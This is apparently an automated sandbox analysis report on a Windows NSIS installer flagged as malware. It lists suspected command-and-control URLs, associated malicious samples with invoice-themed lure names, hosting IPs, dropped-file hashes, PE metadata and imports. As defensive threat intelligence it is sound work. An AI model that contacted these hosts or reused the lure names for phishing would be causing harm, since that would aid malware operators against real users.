                                                                      • www.northtlc.com/m3rc/?JhJ=nrKTeKZE0MKRctV+tdCe7tH49jiRWtcoL+pYt/4T2TK5ImATI1hTaadRMLqMNSc4YR513hnjbQ==&qR=J4i8zf50NBY44rGp
                                                                      l4M4vBmzSCgDmGC.exeGet hashmaliciousBrowse
                                                                      • www.alfenafootwear.com/66op/?Cxo0=ctGTotGx&pZRxnjD=1IjlgHsu4nmTspcAscJq6B9ChB/RinhJ8EPNuHHkIIXoqzkSIUbMD/hNb1QsnQqC6qxc
                                                                      PI1942100023.exeGet hashmaliciousBrowse
                                                                      • www.kmeltonbeauty.com/3edq/?IRrDPny=Irpq6xX1eV14eXESY49R8tV/qgMqmFwNB65EjppLgmg6KjCBrtuzfWySUxcgx76Ji/1p&Bl=lHLLrt6PJPF
                                                                      Inv3063200.exeGet hashmaliciousBrowse
                                                                      • www.pharma-vie.com/vfm2/?k2MdtP=LQgpqqUUD6tFYXGR2/mF5jabv4guhNbmYJlcSe5R95BY6NRPD5v3bo31AxyBkgVBxzRE&NZitYp=zL3h2V_pyz
                                                                      Produktkatalog2021_pdf.exeGet hashmaliciousBrowse
                                                                      • www.successclickmg.com/nu8e/?Rd8xg2=oyYKGSFYjAEVgv6eM1XFsxyoJdZlCypBLH2eqexNhJV07wFNRboEuXo5qh1rT/X7vJI6&ExoLn6=2dmL
                                                                      New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                      • www.cosmicalerts.com/un8c/?FbXpspL=eTH1tzrzqkqSuOvqvhHj+PzhTkzTDFFQy2F5MQjG6S/yeeyrs282kqlecVgWoEx6WA+v&EZXtxn=tXEPRnYpiZ_H
                                                                      Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exeGet hashmaliciousBrowse
                                                                      • www.jennifermarieinteriors.com/qd8i/?Qp=rxD0eyQYawjOPT69ZPEsc5Zpd9R/L+6Ma3KQ/ZI/SH6HxpK7FRWwFkq2nSlbCjzW9hcK&xPWH_=LVz4vpXpDf7DLZ

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.goldinsacks.comRFQ - Upgrade Project (PML) 0000052021.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.40
                                                                      shops.myshopify.comtriage_dropped_file.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      RFQ K1062 PROJECT.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      qXDtb88hht.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      RFQ.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Telex_Payment.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      ORDER0429.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Remittance advice.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      HQvI0y1Wu4.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      003 SOA.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      DOC1073.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      SKMBT_C22421033008180 png.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      swift.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      CONTRACT SWIFT.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PO 4500151298.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Bidding of BMP Project EMMP.99876786.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      DIGITALOCEAN-ASNUSProforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                      • 138.197.103.178
                                                                      46113.dllGet hashmaliciousBrowse
                                                                      • 157.245.231.228
                                                                      46113.dllGet hashmaliciousBrowse
                                                                      • 157.245.231.228
                                                                      Payment Copy.exeGet hashmaliciousBrowse
                                                                      • 68.183.229.215
                                                                      teX5sUCWAg.exeGet hashmaliciousBrowse
                                                                      • 161.35.179.108
                                                                      16X4iz8fTb.exeGet hashmaliciousBrowse
                                                                      • 139.59.176.201
                                                                      teX5sUCWAg.exeGet hashmaliciousBrowse
                                                                      • 161.35.179.108
                                                                      P M.exeGet hashmaliciousBrowse
                                                                      • 138.68.75.3
                                                                      Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                      • 68.183.21.244
                                                                      03062021.exeGet hashmaliciousBrowse
                                                                      • 159.89.241.246
                                                                      85OpNw6eXm.exeGet hashmaliciousBrowse
                                                                      • 46.101.214.246
                                                                      JJ1PbTh0SP.dllGet hashmaliciousBrowse
                                                                      • 174.138.22.216
                                                                      rHk5KU7bfT.exeGet hashmaliciousBrowse
                                                                      • 64.227.90.87
                                                                      gkeAUexwql.exeGet hashmaliciousBrowse
                                                                      • 206.189.227.255
                                                                      Sbb4QCilrT.exeGet hashmaliciousBrowse
                                                                      • 139.59.176.201
                                                                      SPARE PARTS.docGet hashmaliciousBrowse
                                                                      • 206.81.31.203
                                                                      Quotation.docGet hashmaliciousBrowse
                                                                      • 206.81.31.203
                                                                      Payment Advice.exeGet hashmaliciousBrowse
                                                                      • 159.89.241.246
                                                                      lQsa52UcOF.xlsbGet hashmaliciousBrowse
                                                                      • 159.203.18.194
                                                                      transferred.exeGet hashmaliciousBrowse
                                                                      • 64.227.90.87
                                                                      GODADDY-AMSDE3arZKnr21W.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      RFQ K1062 PROJECT.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                      • 160.153.137.40
                                                                      17jLieeOPx.exeGet hashmaliciousBrowse
                                                                      • 160.153.137.40
                                                                      Quietanza_rif392.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      Quietanza_rif392.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Payment_Advice.exeGet hashmaliciousBrowse
                                                                      • 160.153.245.113
                                                                      Bonus_Ditta2302.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      Bonus_Ditta2302.pdf.jarGet hashmaliciousBrowse
                                                                      • 160.153.132.203
                                                                      Revised_Order PDF.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                                      • 160.153.138.71
                                                                      wire_confirmation.pdf.exeGet hashmaliciousBrowse
                                                                      • 160.153.246.73
                                                                      Inv 272590.docGet hashmaliciousBrowse
                                                                      • 160.153.133.162
                                                                      Payment_Advice.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Items and Specification Needed for RFQ546092227865431209PDF.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      Ack0527073465.exeGet hashmaliciousBrowse
                                                                      • 160.153.136.3
                                                                      ARUBA-ASNITcy.exeGet hashmaliciousBrowse
                                                                      • 89.46.110.6
                                                                      RFQ - Upgrade Project (PML) 0000052021.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.40
                                                                      pKTxIEQs6I.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      3z2eOYszJw.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      ccOtGqqBJB.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      Bco0MUkxd3.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      ICNdIx3GY1.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      SecuriteInfo.com.Mal.GandCrypt-B.921.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      QEQq6lmEpj.exeGet hashmaliciousBrowse
                                                                      • 212.237.61.115
                                                                      cy.exeGet hashmaliciousBrowse
                                                                      • 89.46.110.6
                                                                      IMAGE20210427001922654.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.45
                                                                      New_Order.exeGet hashmaliciousBrowse
                                                                      • 62.149.189.71
                                                                      4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                      • 62.149.142.170
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.40
                                                                      8D7A2AE1A479BBCA9229723C2308C564B7477791E047D.exeGet hashmaliciousBrowse
                                                                      • 188.213.167.248
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      DcDVzchpHN.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      S1grVjDTSa.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      HG1fxDiIfH.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dllProforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                        3arZKnr21W.exeGet hashmaliciousBrowse
                                                                          Shipping receipt.exeGet hashmaliciousBrowse
                                                                            New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                              YZ8OvkljWm.exeGet hashmaliciousBrowse
                                                                                U03c2doc.exeGet hashmaliciousBrowse
                                                                                  QUOTE061021.exeGet hashmaliciousBrowse
                                                                                    PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                      PO187439.exeGet hashmaliciousBrowse
                                                                                        090009000000090.exeGet hashmaliciousBrowse
                                                                                          NEWORDERLIST.exeGet hashmaliciousBrowse
                                                                                            00404000004.exeGet hashmaliciousBrowse
                                                                                              40900900090000.exeGet hashmaliciousBrowse
                                                                                                INVO090090202.exeGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exeGet hashmaliciousBrowse
                                                                                                    D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exeGet hashmaliciousBrowse
                                                                                                      D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exeGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Variant.Bulz.383129.23206.exeGet hashmaliciousBrowse
                                                                                                          SecuriteInfo.com.Variant.Bulz.383129.29566.exeGet hashmaliciousBrowse
                                                                                                            ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exeGet hashmaliciousBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6
                                                                                                              Process:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):164352
                                                                                                              Entropy (8bit):7.998758173527995
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:3072:QT5c8TmXd3cHrOEnBjJYnX/3VOe6PbETLuf3wKW/Hic0bFaj24k9p1C:QT4tcHrnjJGvFOpoT4W/fVip8
                                                                                                              MD5:B0D1F8FE2661BB67EAE722EF05BB2EA6
                                                                                                              SHA1:63478D37EF57D85F0CC92FCBBB3680EEC90FB384
                                                                                                              SHA-256:02ECBE9DFAACA44A385946BF2A10AB675CD3AC64E66811D1333A9EBCBB728A4F
                                                                                                              SHA-512:318172A5D104A9C782D1CCC81F09A67241E85E2EF9E8B2F76661E977DC61B85E373593B4CC3F2BFFC963CC5D98C44BA399197F1E40391FB4513AD718884C2683
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: ./f.t.L.['.3...._2.q.".4.H.#..Nn..J...^Z.wn..f..&...w-..NH`.S.Q.?.v..o...40........o.c...oxy.Z#.(XD.....H8..4.!f...,.B..ok..g..Fq.z..n..)ap.e......7.d.8<.....IB.{...Hkq~..a.\..8.h9.. .4c....+K..$.....M....k..}V.z.8.;..b..P.6....M.....4.Lu.Ifx.e.=wV...q.=i...g..)~W.ca.-..........23.....B.......m..!h.......y...r.@........9G.;m.p<......Yy.j._...W...[.S./.......TU.4....L.}._%j..eW.h...u/-..GT..}.Q..W.h...=4.s..x..j..zU....*...........,s&..<V>...(.`Xx..x....-3..o.\.Z|M/.Q+,.~........4.........(hY.O;...p.F...~...).L.....'M.g.@..b...u........{....s.....I......QX..[...i..x..f.J.......$.?*.q.-e*..U.y......f..h..2'....1...dJT.._.a...K.c...{.@......id..b..p;..~...........lZ7E..K.e...q...S.....?[......o...9NSx,../..\...B...n.B....T..4...-.......I..L&-.^...........l9...L....fj.G..V........8..<C.L.X....+J..L2...A..@D...`?........)...o..f`...~4.`...T.zH..Y...z]..}=..P..t.[.:.:m.6..r.D...4.8.......6.X.a......+.]..pc@.1..q.<.g..K._..L...rF...
                                                                                                              C:\Users\user\AppData\Local\Temp\dceotuvjnitpz
                                                                                                              Process:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56977
                                                                                                              Entropy (8bit):4.980974364016973
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:kpYDj6sp0NqCBljcLGbeeqr8uXKZnH/E/pl7f3tsfLvE:ScfOQLGbzqb6ZfEP3F
                                                                                                              MD5:EA1030174F35B4071E9655765BDEE0A7
                                                                                                              SHA1:E1DA533CAD9DD79A6CA5567840631492B546FAF1
                                                                                                              SHA-256:EA9A33E85D080A56D1242F112240E1396C45149913A7CBFED0132E0BA171561A
                                                                                                              SHA-512:2DE92DBD68B66527981E28ACCCA0C01676C35A5CCF951A0B429799DBE1BBDEFF86931D3E211891D2EC1A44D19132D45E10ADEC6A56D122BABFFDBF64C540A909
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: U.......S........b...........%....... .....!.....".....#...a.$...v.%...3.&.....'.....(.....).....*...a.+.....,...a.-.........../.....0.....1.....2.....3...Q.4.....5...4.6.....7...=.8...%.9.....:.....;.....<.....=.....>...A.?.....@.....A...5.B.....C.....D...=.E.....F...I.G.....H.....I.....J...5.K...W.L.....M.....N.....O.....P...5.Q.....R.....S.....T...5.U.....V.....W...=.X.....Y.....Z.....[...=.\.....].....^...4._.....`...U.a.....b.....c.....d.....e.....f...~.g.....h.....i.....j.....k.....l.....m...Y.n.....o.....p...U.q.....r...I.s.....t.....u.....v...Y.w...W.x.....y.....z.....{.....|...Y.}.....~...............Y.................U.......................U.................4...............................................~.....y.................................................................I.............................W..............................
                                                                                                              C:\Users\user\AppData\Local\Temp\nsyA3E3.tmp
                                                                                                              Process:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):254631
                                                                                                              Entropy (8bit):7.4186917232920075
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:6GpT4tcHrnjJGvFOpoT4W/fVipc4dL9bRP4t:b4tcLjJG9OpoT4W/fViDdpb58
                                                                                                              MD5:6805AECB719838AC09004E2E0655BDED
                                                                                                              SHA1:5D1F4A1429C20E9105F1800B13E558022FD15294
                                                                                                              SHA-256:A764168E4B558D726EF4AAC92AF20367FB229F7B42AECE6EAB191B4208B5E61B
                                                                                                              SHA-512:4784DB4AA246735148204058EF8F0108E1FB3D49BFDF76CCC15A56E2251E43F54FECFA53C7338F15E9DAF5EA16F53A3A79A5A01DDE95403E395C5F95062D952F
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: .T......,.......................T=...... S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................|.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll
                                                                                                              Process:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):11776
                                                                                                              Entropy (8bit):5.855045165595541
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                              MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                              SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                              SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                              SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                              • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                              • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                              • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: YZ8OvkljWm.exe, Detection: malicious, Browse
                                                                                                              • Filename: U03c2doc.exe, Detection: malicious, Browse
                                                                                                              • Filename: QUOTE061021.exe, Detection: malicious, Browse
                                                                                                              • Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                              • Filename: PO187439.exe, Detection: malicious, Browse
                                                                                                              • Filename: 090009000000090.exe, Detection: malicious, Browse
                                                                                                              • Filename: NEWORDERLIST.exe, Detection: malicious, Browse
                                                                                                              • Filename: 00404000004.exe, Detection: malicious, Browse
                                                                                                              • Filename: 40900900090000.exe, Detection: malicious, Browse
                                                                                                              • Filename: INVO090090202.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe, Detection: malicious, Browse
                                                                                                              • Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse
                                                                                                              • Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Variant.Bulz.383129.23206.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Variant.Bulz.383129.29566.exe, Detection: malicious, Browse
                                                                                                              • Filename: ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exe, Detection: malicious, Browse
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                              Entropy (8bit):7.912934279663738
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:UGGJ4NnzFz.exe
                                                                                                              File size:223620
                                                                                                              MD5:b148ae414eb8a1b34a15cdb32c21f9ee
                                                                                                              SHA1:25b78f76010cc34843352c78d4f8e07a28b46b32
                                                                                                              SHA256:193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
                                                                                                              SHA512:9f6efbfdd1ab7bed6e0efcff882fd05816c0cbb6b413abce562f1ab6c8adbfa2d86610299be8d399ba36a305b64cadc762806eaa4c647d9b04fd457ec1537d0a
                                                                                                              SSDEEP:6144:Ds9G4RsUIfpwRmZfqJxbx3jjTQeGYWAaE:yG45IfpTIxV3jHQeGYn
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                              File Icon

                                                                                                              Icon Hash:b2a88c96b2ca6a72

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x40323c
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              sub esp, 00000180h
                                                                                                              push ebx
                                                                                                              push ebp
                                                                                                              push esi
                                                                                                              xor ebx, ebx
                                                                                                              push edi
                                                                                                              mov dword ptr [esp+18h], ebx
                                                                                                              mov dword ptr [esp+10h], 00409130h
                                                                                                              xor esi, esi
                                                                                                              mov byte ptr [esp+14h], 00000020h
                                                                                                              call dword ptr [00407030h]
                                                                                                              push 00008001h
                                                                                                              call dword ptr [004070B4h]
                                                                                                              push ebx
                                                                                                              call dword ptr [0040727Ch]
                                                                                                              push 00000008h
                                                                                                              mov dword ptr [00423F58h], eax
                                                                                                              call 00007F1588A77B6Eh
                                                                                                              mov dword ptr [00423EA4h], eax
                                                                                                              push ebx
                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                              push 00000160h
                                                                                                              push eax
                                                                                                              push ebx
                                                                                                              push 0041F458h
                                                                                                              call dword ptr [00407158h]
                                                                                                              push 004091B8h
                                                                                                              push 004236A0h
                                                                                                              call 00007F1588A77821h
                                                                                                              call dword ptr [004070B0h]
                                                                                                              mov edi, 00429000h
                                                                                                              push eax
                                                                                                              push edi
                                                                                                              call 00007F1588A7780Fh
                                                                                                              push ebx
                                                                                                              call dword ptr [0040710Ch]
                                                                                                              cmp byte ptr [00429000h], 00000022h
                                                                                                              mov dword ptr [00423EA0h], eax
                                                                                                              mov eax, edi
                                                                                                              jne 00007F1588A74F6Ch
                                                                                                              mov byte ptr [esp+14h], 00000022h
                                                                                                              mov eax, 00429001h
                                                                                                              push dword ptr [esp+14h]
                                                                                                              push eax
                                                                                                              call 00007F1588A77302h
                                                                                                              push eax
                                                                                                              call dword ptr [0040721Ch]
                                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                                              jmp 00007F1588A74FC5h
                                                                                                              cmp cl, 00000020h
                                                                                                              jne 00007F1588A74F68h
                                                                                                              inc eax
                                                                                                              cmp byte ptr [eax], 00000020h
                                                                                                              je 00007F1588A74F5Ch
                                                                                                              cmp byte ptr [eax], 00000022h
                                                                                                              mov byte ptr [eax+eax+00h], 00000000h

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                              RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                              RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                              RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                              RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                              RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
